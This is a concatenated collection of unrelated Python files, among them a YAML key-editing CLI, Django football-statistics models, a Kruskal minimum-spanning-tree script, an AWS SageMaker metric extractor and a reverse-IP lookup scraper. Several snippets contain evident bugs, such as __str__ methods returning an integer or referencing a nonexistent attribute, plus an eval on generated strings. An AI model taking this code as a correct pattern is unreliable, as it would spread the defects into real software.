ruamel.yaml.round_trip_dump(data) ) newFile.close() ## createTxtFile # # @param[in] filename # @param[in] data # @param[in] autoConfirm # @param[in] quiet # def createTxtFile(outputFileName, data, autoConfirm, quiet): # see if file exists if os.path.exists(outputFileName): # See if we autoconfirmed if autoConfirm or quiet: pass else: userInput = raw_input('File \'' + str(outputFileName) + '\' exists. Overwrite? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' return # Create the file newFile = open(outputFileName,'w') newFile.write( data ) newFile.close() ## replaceValue # # @param[in] inputFileName # @param[in] outputFileName # @param[in] [keyName,newValue] # @param[in] autoConfirm # @param[in] quiet # def replaceValue(inputFileName, outputFileName, values, autoConfirm, quiet): keyName = values[0] newValue = values[1] inputFile = None # Handle to input file data # Open file try: inputFile = open(inputFileName) except Exception as e: raise Exception('Could not open/parse file \'' + str(inputFileName) + '\': ' + str(e)) # Load it data = ruamel.yaml.round_trip_load(inputFile, preserve_quotes=True) # See if the key exists # TODO move this piece into a method called 'findNode', and let createValue use it as well keyPath = str(keyName).split('.') lastNodeName = keyPath.pop() currentNode = data for nodeName in keyPath: if nodeName in currentNode: currentNode = currentNode[nodeName] else: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Check that last key if lastNodeName not in currentNode: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Update the value if not quiet: extra = '' if str(newValue).find(',') != -1: extra = ' (a list)' if isinstance(currentNode[lastNodeName],str): print 'Updating \'' + str(keyName) + '\' from \'' + currentNode[lastNodeName] + '\' to \'' + newValue + '\'' + extra else: print 'Updating \'' + str(keyName) + '\', which is not currently a string, to \'' + newValue + '\'' + extra if autoConfirm == False and quiet == False: userInput = raw_input('Continue? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' return # See if new value is a string or a list if str(newValue).find(',') == -1: currentNode[lastNodeName] = newValue else: newValueList = str(newValue).split(',') # If this was a trailing ',', then we treat it as a list but we are not going to add a null entry if newValueList[-1] == '': newValueList.pop() currentNode[lastNodeName] = newValueList # Output if outputFileName is None: print ruamel.yaml.round_trip_dump(data) else: createFile(outputFileName, data, autoConfirm, quiet) ## createValue # # @param[in] inputFileName # @param[in] outputFileName # @param[in] [keyName,newValue] # @param[in] autoConfirm # @param[in] quiet # def createValue(inputFileName, outputFileName, values, autoConfirm, quiet): keyName = values[0] newValue = values[1] inputFile = None # Handle to input file data # Open file try: inputFile = open(inputFileName) except Exception as e: raise Exception('Could not open/parse file \'' + str(inputFileName) + '\': ' + str(e)) # Load it data = ruamel.yaml.round_trip_load(inputFile, preserve_quotes=True) # See if the key exists, create the new path if necessary keyAlreadyExists = True keyPath = str(keyName).split('.') lastNodeName = keyPath.pop() currentNode = data for nodeName in keyPath: if nodeName in currentNode: currentNode = currentNode[nodeName] else: keyAlreadyExists = False currentNode[nodeName] = {} currentNode = currentNode[nodeName] if lastNodeName not in currentNode: keyAlreadyExists = False currentNode[lastNodeName] = {} outputMessage = 'Creating ' if keyAlreadyExists: outputMessage = 'Updating existing key ' if not quiet: extra = '' if str(newValue).find(',') != -1: extra = ' (a list)' if isinstance(currentNode[lastNodeName],str): print outputMessage + '\'' + str(keyName) + '\' from \'' + currentNode[lastNodeName] + '\' to \'' + newValue + '\'' + extra else: print outputMessage + '\'' + str(keyName) + '\' as \'' + newValue + '\'' + extra if autoConfirm == False and quiet == False: userInput = raw_input('Continue? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' return # See if new value is a string or a list if str(newValue).find(',') == -1: currentNode[lastNodeName] = newValue else: newValueList = str(newValue).split(',') # If this was a trailing ',', then we treat it as a list but we are not going to add a null entry if newValueList[-1] == '': newValueList.pop() currentNode[lastNodeName] = newValueList # Output if outputFileName is None: print ruamel.yaml.round_trip_dump(data) else: createFile(outputFileName, data, autoConfirm, quiet) ## newFile # # @param[in] outputFileName # @param[in] [keyName,newValue] # @param[in] autoConfirm # @param[in] quiet # def newFile(outputFileName, values, autoConfirm, quiet): keyName = values[0] newValue = values[1] # New data newData = '' # See if the key exists, create the new path if necessary numTabs = 0 keyPath = str(keyName).split('.') lastNodeName = keyPath.pop() for nodeName in keyPath: # Build out the data if numTabs == 0: newData += str(nodeName) + ':' # Make sure we put the applicable number of tabs in else: newData += '\n' for x in range(0, numTabs): newData += ' ' newData += str(nodeName) + ':' numTabs += 1 # Last node, again make sure we do the applicable number of tabs newData += '\n' for x in range(0, numTabs): newData += ' ' newData += lastNodeName + ': ' + newValue + '\n' # Confirm if autoConfirm == False and quiet == False: userInput = raw_input('Create new yaml? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' return # Prep the yaml object data = ruamel.yaml.round_trip_load(newData, preserve_quotes=True) # Output if outputFileName is None: print ruamel.yaml.round_trip_dump(data) else: createFile(outputFileName, data, autoConfirm, quiet) ## deleteKey # # @param[in] inputFileName # @param[in] outputFileName # @param[in] keyName # @param[in] autoConfirm # @param[in] quiet # def deleteKey(inputFileName, outputFileName, keyName, autoConfirm, quiet): inputFile = None # Handle to input file data # Open file try: inputFile = open(inputFileName) except Exception as e: raise Exception('Could not open/parse file \'' + str(inputFileName) + '\': ' + str(e)) # Load it data = ruamel.yaml.round_trip_load(inputFile, preserve_quotes=True) # See if the key exists # TODO move this piece into a method called 'findNode', and let createValue use it as well keyPath = str(keyName).split('.') lastNodeName = keyPath.pop() currentNode = data for nodeName in keyPath: if nodeName in currentNode: currentNode = currentNode[nodeName] else: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Check that last key if lastNodeName not in currentNode: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Update the value if not quiet: if isinstance(currentNode[lastNodeName],str): print 'Removing key \'' + str(keyName) + '\' which has value \'' + currentNode[lastNodeName] +'\'' else: print 'Removing key \'' + str(keyName) + '\', which is not currently a string' if autoConfirm == False and quiet == False: userInput = raw_input('Continue? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' return del currentNode[lastNodeName] # Output if outputFileName is None: print ruamel.yaml.round_trip_dump(data) else: createFile(outputFileName, data, autoConfirm, quiet) ## getValue # # @param[in] inputFileName # @param[in] outputFileName # @param[in] keyName # @param[in] autoConfirm # @param[in] quiet # def getValue(inputFileName, outputFileName, keyName, autoConfirm, quiet): inputFile = None # Handle to input file data # Open file try: inputFile = open(inputFileName) except Exception as e: raise Exception('Could not open/parse file \'' + str(inputFileName) + '\': ' + str(e)) # Load it data = ruamel.yaml.round_trip_load(inputFile, preserve_quotes=True) # See if the key exists # TODO move this piece into a method called 'findNode', and let createValue use it as well keyPath = str(keyName).split('.') lastNodeName = keyPath.pop() currentNode = data for nodeName in keyPath: if nodeName in currentNode: currentNode = currentNode[nodeName] else: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Check that last key if lastNodeName not in currentNode: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Get the value if outputFileName is None: if isinstance(currentNode[lastNodeName],str): print currentNode[lastNodeName] else: print ruamel.yaml.round_trip_dump(currentNode[lastNodeName]) else: if isinstance(currentNode[lastNodeName],str): createTxtFile(outputFileName, currentNode[lastNodeName], autoConfirm, quiet) else: createFile(outputFileName, currentNode[lastNodeName], autoConfirm, quiet) ## main # def main(argv): # Set up some variables inputFileName = None outputFileName = None actions = {} autoConfirm = False quiet = False # Grab and process the command line arguments opts, args = getopt.getopt(argv, 'hvyqnrcf:o:d:g:') for opt, arg in opts: if opt == '-f': inputFileName = str(arg) if opt == '-o': outputFileName = str(arg) if opt == '-y': autoConfirm = True if opt == '-q': quiet = True if opt == '-v': printVersion() sys.exit(0) if opt == '-h': printHelp() sys.exit(0) # For delete, only one value, the key if opt == '-d': actions['delete'] = str(arg) # For get, only one value, the key if opt == '-g': actions['get'] = str(arg) # If -r is used, we assume two arguments if opt == '-r': if len(args) != 2: print >> sys.stderr, 'ERROR: -r expects 2 arguments' sys.exit(2) sourceKey = None newValue = None if args[0]: sourceKey = str(args[0]) if args[1]: newValue = str(args[1]) actions['replace'] = [sourceKey,newValue] # If -c is used, we assume two arguments if opt == '-c': if len(args) != 2: print >> sys.stderr, 'ERROR: -c expects 2 arguments' sys.exit(2) sourceKey = None newValue = None if args[0]: sourceKey = str(args[0]) if args[1]: newValue = str(args[1]) actions['create'] = [sourceKey,newValue] # If -n is used, we assume two arguments if opt == '-n': if len(args) != 2: print >> sys.stderr, 'ERROR: -n expects 2 arguments' sys.exit(2) sourceKey = None newValue = None if args[0]: sourceKey = str(args[0]) if args[1]: newValue = str(args[1]) actions['new'] = [sourceKey,newValue] # Error checking if len(actions) == 0: print >> sys.stderr, 'ERROR: no action specified' sys.exit(4) # Perform whatever action for action in actions: if action == 'replace': if inputFileName is None: print >> sys.stderr, 'ERROR: input file name expected (-f option)' sys.exit(3) try: replaceValue(inputFileName,outputFileName,actions[action],autoConfirm,quiet) except Exception as e: print 'ERROR: ' + str(e) sys.exit(5) elif action == 'create': if inputFileName is None: print >> sys.stderr, 'ERROR: input file name expected (-f option)' sys.exit(3) try: createValue(inputFileName,outputFileName,actions[action],autoConfirm,quiet) except Exception as e: print 'ERROR: ' + str(e) sys.exit(5) elif action == 'new': try: newFile(outputFileName,actions[action],autoConfirm,quiet) except Exception as e: print 'ERROR: ' + str(e) sys.exit(5) elif action == 'delete': try: deleteKey(inputFileName,outputFileName,actions[action],autoConfirm,quiet) except Exception as e: print 'ERROR: ' + str(e) sys.exit(5) elif action == 'get': try: getValue(inputFileName,outputFileName,actions[action],autoConfirm,quiet) except Exception as e: print 'ERROR: ' + str(e) sys.exit(5) # Unknown action else: print >> sys.stderr, 'ERROR: unknown action: ' + str(action) if not quiet: print 'Successfully completed' ## Run if __name__ == '__main__': main(sys.argv[1:])
python
# -*- coding: utf-8 -*- from ..tre_elements import TREExtension, TREElement __classification__ = "UNCLASSIFIED" __author__ = "Thomas McCullough" class XINC(TREElement): def __init__(self, value): super(XINC, self).__init__() self.add_field('XINC', 's', 22, value) class XIDC(TREElement): def __init__(self, value): super(XIDC, self).__init__() self.add_field('XIDC', 's', 22, value) class YINC(TREElement): def __init__(self, value): super(YINC, self).__init__() self.add_field('YINC', 's', 22, value) class YIDC(TREElement): def __init__(self, value): super(YIDC, self).__init__() self.add_field('YIDC', 's', 22, value) class IMRFCAType(TREElement): def __init__(self, value): super(IMRFCAType, self).__init__() self.add_loop('XINCs', 20, XINC, value) self.add_loop('XIDCs', 20, XIDC, value) self.add_loop('YINCs', 20, YINC, value) self.add_loop('YIDCs', 20, YIDC, value) class IMRFCA(TREExtension): _tag_value = 'IMRFCA' _data_type = IMRFCAType
python
"""Extracts labels for each actionable widget in an abstract state.""" import math class LabelExtraction: """Extracts labels for each actionable widget in an abstract state.""" @staticmethod def extract_labels(abstract_state, page_analysis): """ Extracts labels for each actionable widget in the given abstract state. Relies on element classifications present in the provided page analysis to determine label candidates. :param abstract_state: The abstract state to process. :param page_analysis: The page analysis output for the provided abstract state (element classifications). """ label_candidates = page_analysis['analysis']['labelCandidates'] for widget in abstract_state.widgets: best_label = None best_label_key = None best_distance = 99999 widget_x = widget["properties"]["x"] widget_y = widget["properties"]["y"] for static_widget in abstract_state.static_widgets: should_skip = LabelExtraction._should_skip(static_widget) if should_skip: continue if static_widget['key'] not in label_candidates: continue text = static_widget["properties"]["text"] if "text" in static_widget["properties"] else None if text: text_x = static_widget["properties"]["x"] text_y = static_widget["properties"]["y"] new_distance = math.hypot(text_x - widget_x, text_y - widget_y) if new_distance < best_distance: best_distance = new_distance best_label = text best_label_key = static_widget["key"] if best_label: best_label = best_label.strip() widget["label"] = best_label widget["label_key"] = best_label_key @staticmethod def _should_skip(widget): """ Determines whether a widget should be skipped when determining if it is a label. Generally, we want to skip headers, and other form fields to prevent other fields being assigned as labels. :param widget: A widget on an abstract state. :return: True if the widget should be skipped. """ tag = widget["properties"]["tagName"] if tag in ['BUTTON', 'INPUT', 'H1', 'H2', 'H3', 'H4', 'H5', 'H6']: return True return False
python
import darkdetect def is_dark(): return darkdetect.isDark()
python
import os import HFSSdrawpy.libraries.example_elements as elt from HFSSdrawpy import Body, Modeler from HFSSdrawpy.parameters import GAP, TRACK # import HFSSdrawpy.libraries.base_elements as base pm = Modeler("hfss") chip1 = Body(pm, "chip1") track = pm.set_variable("20um") gap = pm.set_variable("10um") radius1 = pm.set_variable("100um") radius2 = pm.set_variable("400um") rect1 = chip1.rect([0, 0], ["1mm", "1mm"], layer=TRACK) rect2 = chip1.rect(["0.5mm", "0.5mm"], ["-1mm", "-1mm"], layer=GAP) rect1.unite(rect2) rect1.fillet([radius1, radius2], [[3, 1, 2, -1, -2, -3], [0, 4]]) # convention for fillet : # if the geometry is a genuine base element, fillet indices are order in the # natural way : # - order or points for a polyline # - origin then 'x' dimension point etc for a rectangle # If the polygon result from a boolean operation, the fillets are order # such as the 0th is the leftest among the lowest points. Indices increase # in the trigonometric order. # generate gds file pm.generate_gds(os.path.join(os.getcwd(), "gds_files"), "fillet_test")
python
# coding: utf-8 from django.db import models class Jurado(models.Model): """ xxx """ nome = models.CharField(u'Nome completo', max_length=200) def __str__(self): return self.nome class Meta: db_table = 'tb_jurado' verbose_name = 'Jurado' verbose_name_plural = 'Jurados' class Jogador(models.Model): """ xxx """ GOLEIRO = 0 LATERAL_DIREITO = 1 LATERAL_ESQUERDO = 2 ZAGUEIRO = 3 VOLANTE = 4 MEIA = 5 ATACANTE = 6 POSITIONS_CHOICES = ( (GOLEIRO, 'Goleiro'), (LATERAL_DIREITO, 'Lateral direito'), (ZAGUEIRO, 'Zagueiro'), (VOLANTE, 'Volante'), (MEIA, 'Meia'), (ATACANTE, 'Atacante'), ) nome = models.CharField(u'Nome completo', max_length=200) posicao = models.PositiveSmallIntegerField( choices=POSITIONS_CHOICES, default=GOLEIRO ) def __str__(self): return self.nome class Meta: db_table = 'tb_jogador' verbose_name = 'Jogador' verbose_name_plural = 'Jogadores' class Tecnico(models.Model): """ xxx """ nome = models.CharField(u'Nome completo', max_length=200) def __str__(self): return self.nome class Meta: db_table = 'tb_tecnico' verbose_name = 'Técnico' verbose_name_plural = 'Técnicos' class Arbitro(models.Model): """ xxx """ nome = models.CharField(u'Nome completo', max_length=200) def __str__(self): return self.nome class Meta: db_table = 'tb_arbitro' verbose_name = 'Árbitro' verbose_name_plural = 'Árbitros' class Competicao(models.Model): """ xxx """ nome = models.CharField(u'Nome da competição', max_length=500) def __str__(self): return self.nome class Meta: db_table = 'tb_competicao' verbose_name = 'Competição' verbose_name_plural = 'Competições' class Adversario(models.Model): """ xxx """ nome = models.CharField(u'Nome do time', max_length=200) def __str__(self): return self.nome class Meta: db_table = 'tb_adversario' verbose_name = 'Adversário' verbose_name_plural = 'Adversários' class Estadio(models.Model): """ xxx """ nome = models.CharField(u'Nome do estádio', max_length=500) def __str__(self): return self.nome class Meta: db_table = 'tb_estadio' verbose_name = 'Estádio' verbose_name_plural = 'Estádios' class Jogo(models.Model): """ xxx """ jogadores = models.ManyToManyField( Jogador, related_name="gols", related_query_name="gol", blank=True ) tecnico = models.ForeignKey( Tecnico, related_name="tecnico_jogos", related_query_name="tecnico_jogo" ) arbitro = models.ForeignKey( Arbitro, related_name="arbitro_jogos", related_query_name="arbitro_jogo" ) competicao = models.ForeignKey( Competicao, related_name="competicao_jogos", related_query_name="competicao_jogo" ) adversario = models.ForeignKey( Adversario, related_name="adversario_jogos", related_query_name="adversario_jogo" ) estadio = models.ForeignKey( Estadio, related_name="estadio_jogos", related_query_name="estadio_jogo" ) def __str__(self): return self.competicao.nome class Meta: db_table = 'tb_jogo' verbose_name = 'Jogo' verbose_name_plural = 'Jogos' class Gol(models.Model): """ xxx """ jogo = models.ForeignKey( Jogo, related_name="jogo_gols", related_query_name="jogo_gol" ) jogador = models.ForeignKey( Jogador, related_name="jogador_gols", related_query_name="jogador_gol", blank=True, null=True ) assistente = models.ForeignKey( Jogador, related_name="assitente_gols", related_query_name="assitente_gol", blank=True, null=True ) minuto = models.PositiveIntegerField(unique=False, blank=True, null=True) finalizacao = models.CharField( u'Finalização', max_length=500, blank=True, null=True) local = models.CharField(u'Local', max_length=500, blank=True, null=True) origem = models.CharField(u'Origem', max_length=500, blank=True, null=True) data_hora = models.DateTimeField(u'Data do jogo', blank=True, null=True) def __str__(self): return self.minuto class Meta: db_table = 'tb_gol' verbose_name = 'Gol' verbose_name_plural = 'Gols' class Nota(models.Model): """ xxx """ jurado = models.ForeignKey( Jurado, related_name="jurado_notas", related_query_name="jurado_nota" ) jogo = models.ForeignKey( Jogo, related_name="jogo_notas", related_query_name="jogo_nota" ) jogador = models.ForeignKey( Jogador, related_name="jogador_notas", related_query_name="jogador_nota" ) nota = models.DecimalField(u'Nota', max_digits=20, decimal_places=2) def __str__(self): return self.jurado.none class Meta: db_table = 'tb_nota' verbose_name = 'Nota' verbose_name_plural = 'Notas' class Cartao(models.Model): """ xxx """ AMARELO = 0 VERMELHO = 1 POSITIONS_CHOICES = ( (AMARELO, 'Amarelo'), (VERMELHO, 'Vermelho'), ) jogo = models.ForeignKey( Jogo, related_name="jogo_cartoes", related_query_name="jogo_cartao" ) jogador = models.ForeignKey( Jogador, related_name="jogador_cartoes", related_query_name="jogador_cartao" ) tipo = models.FloatField(u'Nota') def __str__(self): return self.jurado.none class Meta: db_table = 'tb_cartao' verbose_name = 'Cartão' verbose_name_plural = 'Cartões'
python
# Implementation of Kruskal's Algorithm # this is a greedy algorithm to find a MST (Minimum Spanning Tree) of a given connected, undirected graph. graph # So I am implementing the graph using adjacency list, as the user wont be # entering too many nodes and edges.The adjacency matrix is a good implementation # for a graph when the number of edges is large.So i wont be using that here # for sorting purpose import operator # Vertex, which will represent each vertex in the graph.Each Vertex uses a dictionary # to keep track of the vertices to which it is connected, and the weight of each edge. class Vertex: # Initialze a object of this class # we use double underscore def __init__(self, key): # we identify the vertex with its key self.id = key # this stores the info about the various connections any object # (vertex) of this class has using a dictionary which is called connectedTo. # initially its not connected to any other node so, self.connectedTo={} # Add the information about connection between vertexes into the dictionary connectedTo def addNeighbor(self,neighbor,weight=0): # neighbor is another vertex we update the connectedTo dictionary ( Vertex:weight ) # with the information of this new Edge, the key is the vertex and # the edge's weight is its value. This is the new element in the dictionary self.connectedTo[neighbor] = weight # Return a string containing a nicely printable representation of an object. def __str__(self): return str(self.id) + ' connectedTo: ' + str([x.id for x in self.connectedTo]) # Return the vertex's self is connected to in a List def getConnections(self): return self.connectedTo.keys() # Return the id with which we identify the vertex, its name you could say def getId(self): return self.id # Return the value (weight) of the edge (or arc) between self and nbr (two vertices) def getWeight(self,nbr): return self.connectedTo[nbr] # The Graph class contains a dictionary that maps vertex keys to vertex objects (vertlist) and a count of the number of vertices in the graph class Graph: def __init__(self): self.vertList = {} self.numVertices = 0 # Returns a vertex which was added to the graph with given key def addVertex(self,key): self.numVertices = self.numVertices + 1 # create a vertex object newVertex = Vertex(key) # set its key self.vertList[key] = newVertex return newVertex # Return the vertex object corresponding to the key - n def getVertex(self,n): if n in self.vertList: return self.vertList[n] else: return None # Returns boolean - checks if graph contains a vertex with key n def __contains__(self,n): return n in self.vertList # Add's an edge to the graph using addNeighbor method of Vertex def addEdge(self,f,t,cost=0): # check if the 2 vertices involved in this edge exists inside # the graph if not they are added to the graph # nv is the Vertex object which is part of the graph # and has key of 'f' and 't' respectively, cost is the edge weight if f not in self.vertList: nv = self.addVertex(f) if t not in self.vertList: nv = self.addVertex(t) # self.vertList[f] gets the vertex with f as key, we call this Vertex # object's addNeighbor with both the weight and self.vertList[t] (the vertice with t as key) self.vertList[f].addNeighbor(self.vertList[t], cost) # Return the list of all key's corresponding to the vertex's in the graph def getVertices(self): return self.vertList.keys() # Returns an iterator object, which contains all the Vertex's def __iter__(self): return iter(self.vertList.values()) # Now lets make the graph the_graph=Graph() print "enter the number of nodes in the graph" no_nodes=int(raw_input()) # setup the nodes for i in range(no_nodes): print "enter the Node no:"+str(i+1)+"'s key" the_graph.addVertex(raw_input()) print "enter the number of edges in the graph" no_edges=int(raw_input()) # setup the edges for i in range(no_edges): print "For the Edge no:"+str(i+1) print "of the 2 nodes involved in this edge \nenter the first Node's key" node1_key=raw_input() print "\nenter the second Node's key" node2_key=raw_input() print "\nenter the cost (or weight) of this edge (or arc) - an integer" cost=int(raw_input()) # add the edge with this info the_graph.addEdge(node1_key,node2_key,cost) the_graph.addEdge(node2_key,node1_key,cost) """ AS we wont be using counting sort print "enter the maximum weight possible for any of edges in the graph" max_weight=int(raw_input()) """ # graph DONE - start MST finding # step 1 : Take all edges and sort them ''' not required as of now # Time Complexity of Solution: # Best Case O(n+k); Average Case O(n+k); Worst Case O(n+k), # where n is the size of the input array and k means the # values(weights) range from 0 to k. def counting_sort(weights,max_weight): # these k+1 counters are made here is used to know how many times each value in range(k+1) (0 to k) repeats counter=[0]*(max_weight+1) for i in weights: # if you encounter a particular number increment its respective counter counter[i] += 1 # no idea why ndx?! it is the key for the output array ndx=0 # traverse though the counter list for i in range(len(counter)): # if the count of i is more than 0, then append that many 'i' while 0<counter[i]: # rewrite the array which was given to make it ordered weights[ndx] = i ndx += 1 # reset the counter back to the set of zero's counter[i] -= 1 ''' # now we have a optimal sorting function in hand, lets sort the list of edges. # a dictionary with weights of an edge and the vertexes involved in that edge. vrwght={} # take every vertex in the graph for ver1 in the_graph: # take every vertex ver1 is connected to = ver2 for ver2 in ver1.getConnections(): # make the dictionary with the weights and the 2 vertex's involved with the # edge (thier key) use the pair of vertex's id as the key to avoid uniqueness # problems in the dictionary, mutliple edges might have the SAME weight vrwght[ver1.getId(),ver2.getId()]=[ver1.connectedTo[ver2]] print "\nThe edges with thier unsorted weights are" print vrwght sorted_weights=sorted(vrwght.items(), key=operator.itemgetter(1)) print "\nAfter sorting" print sorted_weights # Now step 2 : now we the smallest edge wrt to weight and add it to the MST, # IF the two nodes associated with the edge belong TO DIFFERENT sets. # What? well see kruskal's algo for finding the MST is simple, # we take the graph, remove all the edges and order them based on thier weight # now we replace all the removed edges back to the "graph" (which we just now plucked clean) # smallest first. Subject to the condition that adding a edge doesnt cause a CYCLE or LOOP # to develop, a tree cant have such loops we must avoid them.so we skip them # so this series of steps explains Kruskal's algorithm: """ 1. Take all edges in an array and Sort that array (in an ascending order) 2. Take the next (minimum edge), examine its end nodes: a) If they belong to different sets, merge their sets and add that edge to the tree b) Otherwise skip the edge 3. Print the tree obtained. """ # 2. a) is the method used to check if adding a particular edge will cause a cycle, # Thus comes the UNION-FIND algorithm : # Many thanks to David Eppstein of the University of California, # this is taken from PADS, a library of Python Algorithms and Data Structures class UnionFind: """Union-find data structure. Each unionFind instance X maintains a family of disjoint sets of hashable objects, supporting the following two methods: FIND - X[item] returns a name for the set containing the given item. Each set is named by an arbitrarily-chosen one of its members; as long as the set remains unchanged it will keep the same name. If the item is not yet part of a set in X, a new singleton set is created for it. UNION - X.union(item1, item2, ...) merges the sets containing each item into a single larger set. If any item is not yet part of a set in X, it is added to X as one of the members of the merged set. """ def __init__(self): """Create a new empty union-find structure.""" self.weights = {} self.parents = {} def __getitem__(self, object): """Find and return the name of the set containing the object.""" # check for previously unknown object # if the object is not present in the dictionary make the object itself its own parent and set its weight as 1 if object not in self.parents: self.parents[object] = object self.weights[object] = 1 return object # find path of objects leading to the root path = [object] root = self.parents[object] while root != path[-1]: path.append(root) root = self.parents[root] # compress the path and return for ancestor in path: self.parents[ancestor] = root return root def __iter__(self): """Iterate through all items ever found or unioned by this structure.""" return iter(self.parents) def union(self, *objects): """Find the sets containing the objects and merge them all.""" roots = [self[x] for x in objects] heaviest = max([(self.weights[r],r) for r in roots])[1] for r in roots: if r != heaviest: self.weights[heaviest] += self.weights[r] self.parents[r] = heaviest MST={} # lets make a union-find instance - this calls init X=UnionFind() # sets up the graph - make singleton sets for each vertex for vertex_key in the_graph.getVertices(): # get all the vertices set up, make them parents of themselfs, each in thier individual sets # execute FIND for all the vertex's in the_graph X[the_graph.getVertex(vertex_key)] for i in range(len(sorted_weights)): if(X[the_graph.getVertex(sorted_weights[i][0][0])]==X[the_graph.getVertex(sorted_weights[i][0][1])]): pass else: MST[sorted_weights[i][0]]=sorted_weights[i][1] X.union(the_graph.getVertex(sorted_weights[i][0][0]),the_graph.getVertex(sorted_weights[i][0][1])) ''' # now the UNION. for vertex_pair in sorted_weights: print vertex_pair # here sorted_weights[weight] gives the set of 2 vertex's involved in the that edge if(X[the_graph.getVertex(vertex_pair[0][0])]==X[the_graph.getVertex(vertex_pair[0][1])]): # if both vertices have the same parent (name) then they are in the same set, so ignore this edge pass else: # else as they belong to different sets we can ADD this edge to the MST (MST will be a subset of sorted_weights) MST[vertex_pair[0]]=sorted_weights[vertex_pair[0]] # and merge the sets these two vertices belong to thus we call union on them. X.union(the_graph.getVertex(vertex_pair[0]),the_graph.getVertex(vertex_pair[1])) ''' # thus we have the MST done print " \n\nIn the graph with these vertex's" print the_graph.getVertices() print "\nWith these "+str(len(MST))+" edges between the vertexes given above, we obtain a Minimal Spanning Tree\n" print MST print "\nPlease note this is a dictionary with key as the weight of the edge and value as the key's of the two vertex's involved in this edge" # I HAVE TESTED THIS IMPLEMENTATION WITH THE SAMPLE PROBLEM GIVEN IN WIKIPEDIA # THE IMAGE OF THE GRAPH AND THE ONLY MST IS INCLUDED IN THE REPO, ALONG WITH THE # COMMANDLINE I/O OF TESTING, BOTH ARE SAVED AS Kruskal_test (.jpg and .txt respectively)
python
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # SPDX-License-Identifier: MIT-0 import datetime import boto3 import json events_client = boto3.client("events") sagemaker_client = boto3.client("sagemaker") ssm_client = boto3.client("ssm") class Metric: _iam_permissions = [ { "Action": ["events:PutEvents"], "Resource": "arn:aws:events:**REGION**:**ACCOUNT_ID**:event-bus/default", } ] def __init__(self, metric_name, project_name, metadata, environment): """Class constructor. child classes should not need to implement this. Args: metric_name (str): the name of this metric project_name (str): the project the metric belongs to metadata (dict): the metadata """ self.metric_name = metric_name self.project_name = project_name self.metadata = metadata self.environment = environment def get_iam_permissions(self, region, account_id): replaced_list = [] for p in self._iam_permissions: p = ( str(p) .replace("**REGION**", region) .replace("**ACCOUNT_ID**", account_id) ) replaced_list.append(eval(p)) return replaced_list def extract(self): """The method that calculates the value of the metric and formats the output. child classes should not need to implement this.""" return { "MetricName": self.metric_name, "MetricValue": self._compute_value(), "ExtractionDate": datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"), "Metadata": self.metadata, "Environment": self.environment, "ProjectName": self.project_name, } def emit_event(self, payload): """emit an event with a given payload. child classes should not need to implement this. Args: payload (dict): the payload of the event to be emitted """ response = events_client.put_events( Entries=[ { "Source": "metric_extractor", "Resources": [], "DetailType": "metric_extractor", "Detail": json.dumps(payload), } ] ) def _compute_value(self): """This is where the actual calculation happens. Child classes MUST implement this""" raise NotImplementedError class TotalCompletedTrainingJobs(Metric): _iam_permissions = Metric._iam_permissions + [ {"Action": ["sagemaker:ListTrainingJobs"], "Resource": "*"} ] def _compute_value(self): jobs = sagemaker_client.list_training_jobs( StatusEquals="Completed", )["TrainingJobSummaries"] return len(jobs) class CompletedTrainingJobs24h(Metric): _iam_permissions = Metric._iam_permissions + [ {"Action": ["sagemaker:ListTrainingJobs"], "Resource": "*"} ] def _compute_value(self): today = datetime.datetime.now() yesterday = today - datetime.timedelta(days=1) jobs = sagemaker_client.list_training_jobs( StatusEquals="Completed", LastModifiedTimeAfter=yesterday, LastModifiedTimeBefore=today, )["TrainingJobSummaries"] return len(jobs) class NumberEndPointsInService(Metric): _iam_permissions = Metric._iam_permissions + [ {"Action": "sagemaker:ListEndpoints", "Resource": "*"} ] def _compute_value(self): eps = sagemaker_client.list_endpoints( StatusEquals="InService", )["Endpoints"] return len(eps) class SSMParamStoreValueMyName(Metric): _iam_permissions = Metric._iam_permissions + [ { "Action": "ssm:GetParameter", "Resource": "arn:aws:ssm:*:**ACCOUNT_ID**:parameter/MyName", } ] def _compute_value(self): return ssm_client.get_parameter(Name="MyName")["Parameter"]["Value"]
python
from datetime import datetime import pytest @pytest.fixture(scope="module") def setup_lab(lab, authenticated_client): lab_obj = authenticated_client.api.create_lab(**lab) yield lab_obj authenticated_client.api.delete_lab(lab["path"] + lab["name"]) @pytest.fixture(scope="module") def lab(): now = datetime.now() ts = str(datetime.timestamp(now)).split(".")[0] return {"name": f"test-lab-{ts}", "description": "Test Lab", "path": "/"} @pytest.fixture() def lab_path(lab): return lab["path"] + lab["name"]
python
#encoding: UTF-8 import urllib2 import re import socket import time rfile = open('./ip.txt') wfile = open('./result.csv', 'a+') for line in rfile: opener = urllib2.build_opener() time.sleep(0.5) opener.addheaders = [('User-Agent', 'Mozilla/6.0 (Linux 5.5; rv:6.0.2) Gecko/20140101 Firefox/6.0.0')] req = opener.open('http://reverseip.domaintools.com/search/?q='+line.strip()) socket.setdefaulttimeout(8) responseHtml = req.read() match = re.findall(r'<span title=(.+)</span></td>', responseHtml) wfile.write(socket.gethostbyname(line.strip())+','+'\n') print line.strip() for val in match: wfile.write(val+','+'\n') wfile.write('\n') rfile.close() wfile.close()
python
from .sqlalchemy import SQLAlchemy from .db import base db = SQLAlchemy() # db.register_base(base)
python
